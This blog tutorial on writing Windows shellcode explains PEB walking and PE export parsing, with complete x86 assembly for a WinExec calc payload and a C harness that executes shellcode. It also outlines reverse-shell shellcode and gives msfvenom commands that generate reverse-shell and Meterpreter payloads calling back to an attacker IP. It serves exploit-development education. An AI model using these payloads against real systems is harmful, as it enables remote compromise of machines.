Writing Shellcode for Windows
Thilan Dissanayaka Exploit Development April 22, 2020

Writing Shellcode for Windows

In the Linux shellcode article, we wrote shellcode that called the kernel directly — load registers, trigger int 0x80, done. The kernel’s syscall interface is stable, documented, and numbered. Syscall 11 is always execve. Syscall 1 is always exit.

Windows doesn’t work that way.

Windows syscall numbers change between versions — even between service packs. The syscall for NtCreateFile might be 0x55 on Windows 7 and 0x56 on Windows 10. Microsoft considers the syscall interface private and undocumented. You’re supposed to go through the Win32 API — kernel32.dll, ntdll.dll, user32.dll.

This means Windows shellcode must:

  1. Find where kernel32.dll is loaded in memory — at runtime, without hardcoding addresses
  2. Parse kernel32.dll’s export table — walk the PE structure to find function addresses
  3. Resolve the API functions it needsWinExec, LoadLibraryA, GetProcAddress, etc.
  4. Call those functions — finally do something useful

This is significantly more complex than Linux shellcode. But it’s also more elegant — once you understand PEB walking and export parsing, you can call any Windows API function from position-independent shellcode.

The Architecture — Why PEB Walking?

When a Windows process starts, the OS loads several DLLs into its address space. The most important for shellcode:

DLL Why We Need It
kernel32.dll Contains WinExec, LoadLibraryA, GetProcAddress, ExitProcess
ntdll.dll Low-level NT functions, always loaded first
ws2_32.dll WinSock — needed for reverse shells (not loaded by default)

The problem: ASLR randomizes where these DLLs load. We can’t hardcode WinExec = 0x7C8623AD — that address changes every boot.

The solution: every Windows process has a Process Environment Block (PEB) — a data structure that contains, among other things, a linked list of all loaded modules (DLLs) and their base addresses. The PEB is always accessible via a fixed CPU segment register.

TEB (Thread Environment Block)
  ↓ offset 0x30
PEB (Process Environment Block)
  ↓ offset 0x0C
PEB_LDR_DATA
  ↓ offset 0x14
InMemoryOrderModuleList (doubly-linked list)
  → ntdll.dll
  → kernel32.dll (or kernelbase.dll)
  → ...other loaded DLLs

From any thread, at any time, regardless of ASLR:

mov eax, fs:[0x30]    ; EAX = PEB address (always works, 32-bit)
; On 64-bit: mov rax, gs:[0x60]

That’s the entry point. From the PEB, we walk the module list to find kernel32.dll’s base address. From kernel32.dll’s base, we parse the PE export table to find function addresses.

Step 1: Finding kernel32.dll via PEB

The PEB Structure (Relevant Fields)

PEB (at fs:[0x30]):
  +0x00  InheritedAddressSpace
  +0x08  ImageBaseAddress
  +0x0C  Ldr  →  PEB_LDR_DATA
         ...

PEB_LDR_DATA:
  +0x0C  InLoadOrderModuleList
  +0x14  InMemoryOrderModuleList  ← We use this one
  +0x1C  InInitializationOrderModuleList

Each list entry (LDR_DATA_TABLE_ENTRY via InMemoryOrderModuleList):
  +0x00  InMemoryOrderLinks.Flink  (next entry)
  +0x08  InMemoryOrderLinks.Blink  (previous entry)
  +0x10  DllBase                   ← The DLL's base address in memory
  +0x18  EntryPoint
  +0x20  SizeOfImage
  +0x28  FullDllName (UNICODE_STRING)
  +0x30  BaseDllName (UNICODE_STRING)

The InMemoryOrderModuleList is a doubly-linked list of all loaded modules. The order is:

  1. The executable itself (e.g., vulnerable.exe)
  2. ntdll.dll
  3. kernel32.dll (or kernelbase.dll on Win7+)

So to find kernel32.dll, we follow the list: skip the first entry (the exe), skip the second (ntdll), and the third is kernel32.

Assembly: Walking the PEB

; Find kernel32.dll base address
; 32-bit Windows

    xor ecx, ecx
    mov eax, fs:[ecx+0x30]     ; EAX = PEB
    mov eax, [eax+0x0C]        ; EAX = PEB->Ldr (PEB_LDR_DATA)
    mov esi, [eax+0x14]        ; ESI = InMemoryOrderModuleList.Flink (first entry)
    lodsd                       ; EAX = second entry (ntdll.dll)
    xchg eax, esi              ; ESI = second entry
    lodsd                       ; EAX = third entry (kernel32.dll)
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base address!

Let’s trace this:

  1. fs:[0x30] gives us the PEB
  2. PEB+0x0C gives us PEB_LDR_DATA
  3. PEB_LDR_DATA+0x14 gives us the first entry in InMemoryOrderModuleList (the .exe)
  4. First lodsd (loads dword at ESI into EAX, advances ESI) moves to the second entry (ntdll.dll)
  5. Second lodsd moves to the third entry (kernel32.dll)
  6. Entry+0x10 gives us the DllBase — kernel32.dll’s base address

EBX now contains kernel32.dll’s base address. This works regardless of ASLR.

Note on Modern Windows

On Windows 7+, kernelbase.dll sometimes appears before kernel32.dll in the list. kernelbase.dll exports many of the same functions. For maximum compatibility, some shellcode walks the list and checks the module name — but for simplicity, the third-entry assumption works for most cases.

Step 2: Parsing the PE Export Table

Now that we have kernel32.dll’s base address, we need to find specific functions within it. DLLs are PE (Portable Executable) files, and their exported functions are listed in the Export Directory.

PE Structure (from the base address)

Base Address (EBX):
  +0x3C  e_lfanew → offset to PE signature

PE Signature:
  +0x00  "PE\0\0"
  +0x78  Export Directory RVA (Relative Virtual Address)

Export Directory:
  +0x18  NumberOfNames
  +0x1C  AddressOfFunctions   (RVA array of function addresses)
  +0x20  AddressOfNames       (RVA array of function name pointers)
  +0x24  AddressOfNameOrdinals (RVA array of ordinal values)

The export resolution process:

  1. Walk the AddressOfNames array — compare each name to the function we’re looking for
  2. When we find a match at index i — read the ordinal from AddressOfNameOrdinals[i]
  3. Use the ordinal to index into AddressOfFunctions — that gives us the function’s RVA
  4. Add the DLL base address to the RVA — that’s the actual function address

Assembly: Finding a Function by Name

This is the core routine of every Windows shellcode. We’ll write a function that takes a DLL base address and a function name hash, and returns the function address.

Why Hashing?

Comparing strings byte-by-byte in shellcode is bulky. Instead, we compute a hash of each export name and compare it to a pre-computed hash of the function we want. This saves space significantly.

The most common hash algorithm in shellcode is a simple rotate-and-add:

; Hash function: ROR13 + ADD
; Input: ESI = pointer to ASCII string
; Output: EDX = hash

compute_hash:
    xor edx, edx
.hash_loop:
    lodsb                       ; AL = next byte, ESI++
    test al, al
    jz .hash_done
    ror edx, 13                 ; Rotate right by 13
    add edx, eax               ; Add character value
    jmp .hash_loop
.hash_done:
    ret

Pre-compute the hash for WinExec:

def ror13_hash(name):
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ord(c)) & 0xFFFFFFFF
    return h

print(hex(ror13_hash("WinExec")))          # 0x0E8AFE98
print(hex(ror13_hash("ExitProcess")))       # 0x7ED8E273
print(hex(ror13_hash("LoadLibraryA")))      # 0x0726774C
print(hex(ror13_hash("GetProcAddress")))    # 0x7C0DFCAA

Assembly: Complete Export Resolution

; find_function: Resolve a function from a DLL by hash
; Input:  EBX = DLL base address
;         EDX = hash of function name to find
; Output: EAX = function address

find_function:
    pushad
    mov eax, [ebx+0x3C]        ; e_lfanew (offset to PE header)
    mov edi, [ebx+eax+0x78]    ; Export Directory RVA
    add edi, ebx               ; EDI = Export Directory absolute address
    mov ecx, [edi+0x18]        ; ECX = NumberOfNames
    mov eax, [edi+0x20]        ; AddressOfNames RVA
    add eax, ebx               ; EAX = AddressOfNames absolute

.find_loop:
    jecxz .find_fail            ; If no more names, fail
    dec ecx
    mov esi, [eax+ecx*4]       ; ESI = RVA of name[ecx]
    add esi, ebx               ; ESI = absolute address of name string

    ; Compute hash of this export name
    xor edx, edx
.hash_loop:
    lodsb
    test al, al
    jz .hash_done
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_done:
    cmp edx, [esp+0x24]        ; Compare with our target hash (saved on stack)
    jnz .find_loop              ; No match, try next name

    ; Match found! Get the function address
    mov eax, [edi+0x24]        ; AddressOfNameOrdinals RVA
    add eax, ebx
    mov cx, [eax+ecx*2]        ; CX = ordinal for this name
    mov eax, [edi+0x1C]        ; AddressOfFunctions RVA
    add eax, ebx
    mov eax, [eax+ecx*4]       ; EAX = function RVA
    add eax, ebx               ; EAX = function absolute address!

    mov [esp+0x1C], eax        ; Store result (overwrite saved EAX in pushad frame)
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret

Step 3: Putting It All Together — WinExec Shellcode

Now we combine PEB walking + export resolution + the actual payload.

Complete WinExec(“calc.exe”) Shellcode

[BITS 32]

    cld                         ; Clear direction flag

; ===== FIND KERNEL32.DLL =====
    xor ecx, ecx
    mov eax, fs:[ecx+0x30]     ; PEB
    mov eax, [eax+0x0C]        ; PEB->Ldr
    mov esi, [eax+0x14]        ; InMemoryOrderModuleList
    lodsd                       ; Skip exe entry → ntdll
    xchg eax, esi
    lodsd                       ; Skip ntdll → kernel32
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base

; ===== FIND WinExec =====
    mov edx, 0x0E8AFE98        ; Hash of "WinExec"
    call find_function          ; EAX = WinExec address
    mov edi, eax               ; Save WinExec address in EDI

; ===== FIND ExitProcess =====
    mov edx, 0x7ED8E273        ; Hash of "ExitProcess"
    call find_function          ; EAX = ExitProcess address
    mov esi, eax               ; Save ExitProcess address in ESI

; ===== CALL WinExec("calc.exe", 0) =====
    xor ecx, ecx
    push ecx                   ; null terminator
    push 0x6578652E            ; ".exe"
    push 0x636C6163            ; "calc"
    mov eax, esp               ; EAX = pointer to "calc.exe\0" on stack

    push ecx                   ; uCmdShow = 0 (SW_HIDE)
    push eax                   ; lpCmdLine = "calc.exe"
    call edi                   ; Call WinExec("calc.exe", 0)

; ===== CALL ExitProcess(0) =====
    xor ecx, ecx
    push ecx                   ; Exit code = 0
    call esi                   ; Call ExitProcess(0)


; ===== FIND_FUNCTION SUBROUTINE =====
find_function:
    pushad
    mov eax, [ebx+0x3C]
    mov edi, [ebx+eax+0x78]
    add edi, ebx
    mov ecx, [edi+0x18]
    mov eax, [edi+0x20]
    add eax, ebx

.find_loop:
    jecxz .find_fail
    dec ecx
    mov esi, [eax+ecx*4]
    add esi, ebx

    xor edx, edx
.hash_loop:
    lodsb
    test al, al
    jz .hash_compare
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_compare:
    cmp edx, [esp+0x24]
    jnz .find_loop

    mov eax, [edi+0x24]
    add eax, ebx
    mov cx, [eax+ecx*2]
    mov eax, [edi+0x1C]
    add eax, ebx
    mov eax, [eax+ecx*4]
    add eax, ebx
    mov [esp+0x1C], eax
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret

Compiling and Testing

# Assemble
$ nasm -f bin shellcode.asm -o shellcode.bin

# Check for null bytes (must be zero!)
$ xxd shellcode.bin | grep " 00 "

# Extract as hex string
$ xxd -p shellcode.bin | tr -d '\n'

# Check size
$ wc -c shellcode.bin

The C Test Harness

#include <stdio.h>
#include <windows.h>

unsigned char shellcode[] =
"\xfc\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14"
"\xad\x96\xad\x8b\x58\x10..."  // (full shellcode bytes here)
;

int main() {
    printf("Shellcode length: %d\n", sizeof(shellcode) - 1);

    // Allocate executable memory
    void *exec = VirtualAlloc(NULL, sizeof(shellcode),
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);

    memcpy(exec, shellcode, sizeof(shellcode));

    // Execute
    ((void(*)())exec)();

    return 0;
}

Compile with:

> gcc -o test test.c -m32
> test.exe

Calculator should pop up.

Avoiding Null Bytes

Just like Linux shellcode, null bytes (\x00) terminate C strings and break many exploit delivery mechanisms. Common null byte sources and fixes:

Problem Contains Null Fix
mov eax, 0 \xB8\x00\x00\x00\x00 xor eax, eax
push 0 \x6A\x00 xor ecx, ecx; push ecx
mov eax, 0x0E8AFE98 May contain \x00 Check — this one doesn’t
String “calc.exe\0” Null terminator Push null via xor ecx,ecx; push ecx before pushing the string
push 0x00636C61 Leading zero byte Use push 0x61636C63 and rearrange, or encode differently

The string pushing technique:

; Push "calc.exe\0" onto the stack (no null bytes in the code)
xor ecx, ecx
push ecx                   ; Push null terminator (\0)

; "calc.exe" = 63 61 6C 63 2E 65 78 65
; In little-endian dwords:
push 0x6578652E            ; ".exe" (backwards: 2E 65 78 65)
push 0x636C6163            ; "calc" (backwards: 63 61 6C 63)

mov eax, esp               ; EAX points to "calc.exe\0"

Each push puts 4 bytes on the stack in little-endian order. The null terminator is pushed first (via push ecx where ECX=0).

Reverse Shell Shellcode

A calculator pop is a proof of concept. For real exploitation, we need a reverse shell. This requires loading ws2_32.dll (WinSock), which isn’t loaded by default.

The Strategy

  1. Find kernel32.dll → resolve LoadLibraryA and GetProcAddress
  2. Call LoadLibraryA("ws2_32.dll") → load WinSock
  3. Use GetProcAddress to find: WSAStartup, WSASocketA, connect
  4. Initialize WinSock, create a socket, connect to the attacker
  5. Redirect stdin/stdout/stderr to the socket
  6. Spawn cmd.exe
Shellcode flow:
PEB → kernel32.dll base
  → LoadLibraryA("ws2_32.dll") → ws2_32.dll base
  → WSAStartup(0x0202, &wsadata)
  → WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
  → connect(sock, {AF_INET, port, IP}, 16)
  → CreateProcessA("cmd.exe", ..., stdin=sock, stdout=sock, stderr=sock)

This is substantially more complex than Linux reverse shell shellcode (which is ~70 bytes using raw syscalls). Windows reverse shell shellcode is typically 300-500 bytes due to the PEB walking, export resolution, and WinSock setup overhead.

In practice, most exploit developers use msfvenom to generate Windows shellcode:

# Windows reverse shell shellcode
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Windows Meterpreter (staged)
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Exec calc.exe (proof of concept)
$ msfvenom -p windows/exec CMD=calc.exe \
    -f c -a x86 --platform windows -b "\x00"

But understanding how it works under the hood — PEB walking, export parsing, API resolution — is essential for writing custom payloads, debugging failed exploits, and analyzing malware.

Linux vs Windows Shellcode — Complete Comparison

Aspect Linux Windows
Syscall interface Stable, numbered (int 0x80 / syscall) Unstable, undocumented (changes per version)
How to call OS Load registers, trigger interrupt Must find and call DLL functions dynamically
Finding functions Not needed — syscall numbers are fixed Walk PEB → parse PE exports → resolve by hash
Position independence jmp-call-pop for data references PEB walking is inherently position-independent
Typical size (shell) 25-50 bytes 200-500 bytes
Null byte avoidance Same techniques Same techniques
Reverse shell size 70-100 bytes 300-500 bytes
Complexity Simple (register + interrupt) Complex (PEB + PE parsing + API calls)
Key skill Understanding syscall ABI Understanding PE format and Windows internals
Encoding shikata_ga_nai, XOR Same encoders work

The size difference is dramatic. A Linux execve("/bin/sh") shellcode is 21 bytes. The equivalent Windows shellcode (finding kernel32, resolving WinExec, calling it) is ~150+ bytes minimum. This is entirely due to the extra work of dynamic API resolution.

Debugging Shellcode with x32dbg

When shellcode doesn’t work (and it often doesn’t on the first try), x32dbg is your best friend.

Method 1: Test Harness

Compile the C test harness (above), load it in x32dbg, and step through:

1. Set breakpoint at the VirtualAlloc return
2. After VirtualAlloc, note the allocated memory address
3. Set breakpoint at the call to the shellcode (the function pointer call)
4. Step into — you're now inside your shellcode
5. Step through instruction by instruction
6. Watch registers and the stack at each step

Method 2: Inject into a Process

1. Load target process in x32dbg
2. Allocate memory: right-click memory map → Allocate Memory
3. Write shellcode bytes to the allocated region
4. Set EIP to the shellcode address
5. Step through

Key Things to Watch

  • EBX after PEB walk — Does it contain a valid kernel32.dll base? (Should look like 0x7xxx0000)
  • The export table parse — Is EDI pointing to a valid Export Directory? Check with Memory Map to verify it’s within kernel32.dll’s range.
  • The hash comparison — Set a conditional breakpoint on the cmp instruction to catch when your target hash matches.
  • The function address — After find_function returns, is EAX a valid code address within kernel32.dll?
  • The stack before API calls — Are arguments in the right order? Is the stack aligned?

Further Reading and Tools

Resource Purpose
msfvenom Generate Windows shellcode for any payload
Donut Convert .NET assemblies and PE files into position-independent shellcode
SysWhispers Generate direct syscall stubs (bypass API hooking by EDR)
Shellcode compiler (scc) Compile C code into position-independent shellcode
PE-bear GUI PE parser — helps understand DLL structures
Windows Internals (book) Deep dive into PEB, TEB, and loader internals

Final Thoughts

Windows shellcode is harder than Linux shellcode. There’s no way around it. The PEB walking, PE export parsing, and dynamic API resolution add complexity that simply doesn’t exist on Linux. A Linux shellcode writer thinks about registers and syscall numbers. A Windows shellcode writer thinks about PE structures, linked lists, and hash-based function resolution.

But this complexity is also what makes it interesting. The PEB walk is an elegant solution to a real problem — finding code at runtime without any hardcoded addresses. It’s the same technique that malware uses to resolve API functions dynamically (making static analysis harder). Understanding it gives you insight into both offensive and defensive security on Windows.

If you’ve followed the Linux and Windows exploit development series to this point — from basic GDB reversing through stack overflows, ret2libc, and now shellcode internals — you have a solid foundation in low-level exploitation on both platforms.

Happy reversing!

ALSO READ
Blockchain 0x000 – Understanding the Fundamentals
May 21, 2020 Web3 Development

Imagine a world where strangers can exchange money, share data, or execute agreements without ever needing to trust a central authority. No banks, no intermediaries, no single point of failure yet...

Identity and Access Management (IAM)
May 11, 2020 Identity & Access Management

Who are you — and what are you allowed to do? That's the fundamental question every secure system must answer. And it's exactly what Identity and Access Management (IAM) is built to solve.

How I built a web based CPU Simulator
May 07, 2020 Pet Projects

As someone passionate about computer engineering, reverse engineering, and system internals, I've always been fascinated by what happens "under the hood" of a computer. This curiosity led me to...

Writing a Shell Code for Linux
Apr 21, 2020 Exploit Development

Shellcode is a small piece of machine code used as the payload in exploit development. In this post, we write Linux shellcode from scratch — starting with a simple exit, building up to spawning a shell, and explaining every decision along the way.

Exploiting a Stack Buffer Overflow on Windows
Apr 12, 2020 Exploit Development

In a previous tutorial we discusses how we can exploit a buffer overflow vulnerability on a Linux machine. I wen through all theories in depth and explained each step. Now today we are going to jump...

Access Control Models
Apr 08, 2020 Identity & Access Management

Access control is one of the most fundamental concepts in security. Every time you set file permissions, assign user roles, or restrict access to a resource, you're implementing some form of access control. But not all access control is created equal...

Exploiting a  Stack Buffer Overflow  on Linux
Apr 01, 2020 Exploit Development

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening....

Basic concepts of Cryptography
Mar 01, 2020 Cryptography

Ever notice that little padlock icon in your browser's address bar? That's cryptography working silently in the background, protecting everything you do online. Whether you're sending an email,...

Common Web Application Attacks
Feb 05, 2020 Application Security

Web applications are one of the most targeted surfaces by attackers. This is primarily because they are accessible over the internet, making them exposed and potentially vulnerable. Since these...

Remote Code Execution (RCE)
Jan 02, 2020 Application Security

Remote Code Execution (RCE) is the holy grail of application security vulnerabilities. It allows an attacker to execute arbitrary code on a remote server — and the consequences are as bad as it sounds. In this post, we'll go deep into RCE across multiple languages, including PHP, Java, Python, and Node.js.